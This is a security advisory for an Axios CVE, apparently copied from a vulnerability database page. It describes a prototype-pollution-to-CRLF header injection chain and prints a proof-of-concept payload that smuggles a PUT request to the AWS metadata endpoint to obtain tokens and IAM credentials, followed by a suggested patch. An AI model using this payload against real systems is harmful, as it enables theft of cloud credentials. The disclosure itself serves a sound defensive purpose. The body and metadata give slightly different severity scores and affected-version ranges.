返回列表

Axios has Unrestricted Cloud Metadata Exfiltration via Header Injection Chain

CVE-2026-40175RCE2026-04-10

漏洞描述

# Vulnerability Disclosure: Unrestricted Cloud Metadata Exfiltration via Header Injection Chain ## Summary The Axios library is vulnerable to a specific "Gadget" attack chain that allows **Prototype Pollution** in any third-party dependency to be escalated into **Remote Code Execution (RCE)** or **Full Cloud Compromise** (via AWS IMDSv2 bypass). While Axios patches exist for *preventing check* pollution, the library remains vulnerable to *being used* as a gadget when pollution occurs elsewhere. This is due to a lack of HTTP Header Sanitization (CWE-113) combined with default SSRF capabilities. **Severity**: Critical (CVSS 9.9) **Affected Versions**: All versions (v0.x - v1.x) **Vulnerable Component**: `lib/adapters/http.js` (Header Processing) ## Usage of "Helper" Vulnerabilities This vulnerability is unique because it requires **Zero Direct User Input**. If an attacker can pollute `Object.prototype` via *any* other library in the stack (e.g., `qs`, `minimist`, `ini`, `body-parser`), Axios will automatically pick up the polluted properties during its config merge. Because Axios does not sanitise these merged header values for CRLF (`\r\n`) characters, the polluted property becomes a **Request Smuggling** payload. ## Proof of Concept ### 1. The Setup (Simulated Pollution) Imagine a scenario where a known vulnerability exists in a query parser. The attacker sends a payload that sets: ```javascript Object.prototype['x-amz-target'] = "dummy\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\nX-aws-ec2-metadata-token-ttl-seconds: 21600\r\n\r\nGET /ignore"; ``` ### 2. The Gadget Trigger (Safe Code) The application makes a completely safe, hardcoded request: ```javascript // This looks safe to the developer await axios.get('https://analytics.internal/pings'); ``` ### 3. The Execution Axios merges the prototype property `x-amz-target` into the request headers. It then writes the header value directly to the socket without validation. **Resulting HTTP traffic:** ```http GET /pings HTTP/1.1 Host: analytics.internal x-amz-target: dummy PUT /latest/api/token HTTP/1.1 Host: 169.254.169.254 X-aws-ec2-metadata-token-ttl-seconds: 21600 GET /ignore HTTP/1.1 ... ``` ### 4. The Impact (IMDSv2 Bypass) The "Smuggled" second request is a valid `PUT` request to the AWS Metadata Service. It includes the required `X-aws-ec2-metadata-token-ttl-seconds` header (which a normal SSRF cannot send). The Metadata Service returns a session token, allowing the attacker to steal IAM credentials and compromise the cloud account. ## Impact Analysis - **Security Control Bypass**: Defeats AWS IMDSv2 (Session Tokens). - **Authentication Bypass**: Can inject headers (`Cookie`, `Authorization`) to pivot into internal administrative panels. - **Cache Poisoning**: Can inject `Host` headers to poison shared caches. ## Recommended Fix Validate all header values in `lib/adapters/http.js` and `xhr.js` before passing them to the underlying request function. **Patch Suggestion:** ```javascript // In lib/adapters/http.js utils.forEach(requestHeaders, function setRequestHeader(val, key) { if (/[\r\n]/.test(val)) { throw new Error('Security: Header value contains invalid characters'); } // ... proceed to set header }); ``` ## References - **OWASP**: CRLF Injection (CWE-113) This report was generated as part of a security audit of the Axios library. Source Code Location: https://github.com/axios/axios Affected Packages: - npm:axios, affected < 1.15.0, patched in 1.15.0 CWEs: - CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') - CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') - CWE-918: Server-Side Request Forgery (SSRF) CVSS: - Primary: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - CVSS_V3: score 10.0, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H References: - https://github.com/axios/axios/security/advisories/GHSA-fvcv-3m26-pcqx - https://github.com/axios/axios/commit/363185461b90b1b78845dc8a99a1f103d9b122a1 - https://github.com/axios/axios/releases/tag/v1.15.0 - https://github.com/advisories/GHSA-fvcv-3m26-pcqx

查看原文